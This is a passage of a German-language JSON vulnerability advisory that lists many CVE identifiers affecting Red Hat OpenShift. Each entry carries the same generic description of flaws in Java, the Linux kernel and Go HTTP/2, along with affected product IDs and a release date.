dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6932" }, { "cve": "CVE-2023-7008", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-7008" }, { "cve": "CVE-2024-0565", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-0565" }, { "cve": "CVE-2024-0727", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-0727" }, { "cve": "CVE-2024-0841", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-0841" }, { "cve": "CVE-2024-1085", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-1085" }, { "cve": "CVE-2024-1086", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-1086" }, { "cve": "CVE-2024-1394", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-1394" }, { "cve": "CVE-2024-1488", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-1488" }, { "cve": "CVE-2024-21011", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-21011" }, { "cve": "CVE-2024-21012", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-21012" }, { "cve": "CVE-2024-21068", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-21068" }, { "cve": "CVE-2024-21085", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-21085" }, { "cve": "CVE-2024-21094", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-21094" }, { "cve": "CVE-2024-22365", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-22365" }, { "cve": "CVE-2024-24783", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-24783" }, { "cve": "CVE-2024-24784", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-24784" }, { "cve": "CVE-2024-24785", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-24785" }, { "cve": "CVE-2024-24786", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-24786" }, { "cve": "CVE-2024-25062", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-25062" }, { "cve": "CVE-2024-25742", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-25742" }, { "cve": "CVE-2024-25743", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-25743" }, { "cve": "CVE-2024-26582", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26582" }, { "cve": "CVE-2024-26583", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26583" }, { "cve": "CVE-2024-26584", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26584" }, { "cve": "CVE-2024-26585", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26585" }, { "cve": "CVE-2024-26586", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26586" }, { "cve": "CVE-2024-26593", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26593" }, { "cve": "CVE-2024-26602", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26602" }, { "cve": "CVE-2024-26609", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26609" }, { "cve": "CVE-2024-26633", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-26633" }, { "cve": "CVE-2024-27316", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-27316" }, { "cve": "CVE-2024-28834", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2024-28834" }, { "cve": "CVE-2024-28835", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { 